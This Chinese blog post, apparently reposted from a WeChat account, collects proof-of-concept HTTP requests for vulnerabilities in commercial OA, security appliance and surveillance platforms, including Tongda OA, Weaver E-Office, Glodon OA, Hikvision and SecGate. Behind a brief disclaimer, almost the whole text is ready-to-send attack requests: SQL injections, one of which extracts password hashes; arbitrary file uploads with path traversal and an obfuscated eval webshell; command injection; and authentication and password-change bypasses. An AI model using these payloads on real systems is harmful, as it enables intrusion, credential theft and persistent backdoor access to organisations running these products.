2023攻防演练首日漏洞POC合集

admin

102796
文章

87
评论

2023年8月10日01:25:42评论712 views字数 6542阅读21分48秒阅读模式

2023攻防演练首日漏洞POC合集

免责声明

1. 本文仅用于技术交流，目的是向相关安全人员展示漏洞的存在和利用方式，以便更好地提高网络安全意识和技术水平。

2. 任何人不得利用本文中的技术手段进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为，责任自负。

3. 本文中提到的漏洞验证 poc 仅用于授权测试，任何未经授权的测试均属于非法行为。请在法律许可范围内使用此 poc。

4. CVES实验室对使用此 poc 导致的任何直接或间接损失不承担任何责任。使用此 poc 的风险由使用者自行承担。

POC合集

通达OA sql注入漏洞 CVE-2023-4165 POC

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

通达OA sql注入漏洞 CVE-2023-4166 POC

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

泛微E-Office9文件上传漏洞 CVE-2023-2648 POC

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.233.10:8082User-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微E-Office9文件上传漏洞 CVE-2023-2523 POC

POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 Host:192.168.233.10:8082  Cache-Control:max-age=0  Upgrade-Insecure-Requests:1  Origin:null  Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  Accept-Encoding:gzip, deflateAccept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition:form-data; name="upload_quwan"; filename="1.php."Content-Type:image/jpeg<?phpphpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

深信服应用交付系统命令执行漏洞 POC

POST /rep/loginHost:10.10.10.1:85
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

广联达oa sql注入漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达oa 后台文件上传漏洞 POC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie: Connection: closeContent-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC

POST /center/api/files;.html HTTP/1.1Host: 10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip
<%jsp的马%>------WebKitFormBoundary9PggsiM755PLa54a--

HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC

POST /svm/api/external/report HTTP/1.1Host: 10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--

马儿路径：/portal/ui/login/..;/..;/new.jsp
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC

POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"
10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"
obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--

马儿路径：attachements/xxx.php
网神 SecSSL 3600安全接入网关系统任意密码修改漏洞 POC

POST /changepass.php?type=2 
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@

汉得SRM tomcat.jsp 登录绕过漏洞 POC

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1

然后访问后台：/main.screen
辰信景云终端安全管理系统 login SQL注入漏洞 POC

POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

原文始发于微信公众号（山海之关）：2023攻防演练首日漏洞POC合集

左青龙
微信扫一扫

右白虎
微信扫一扫

2023攻防演练首日漏洞POC合集

【红蓝/演练】-事前准备(6)之互联网风险收敛

【红蓝/演练】-事前准备(6)之办公网风险收敛

【红队】lnk钓鱼的奇思妙想(你应该没见过)

记一次对抗中的钓鱼

攻防演练中log4j2的简单利用-攻防演练

某地级市攻防技战术提炼

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

记一次重保期间的实战溯源反制

实战攻防:记一次市级hw

技术交流分享-HW实战案例复盘

发表评论

在线咨询

微信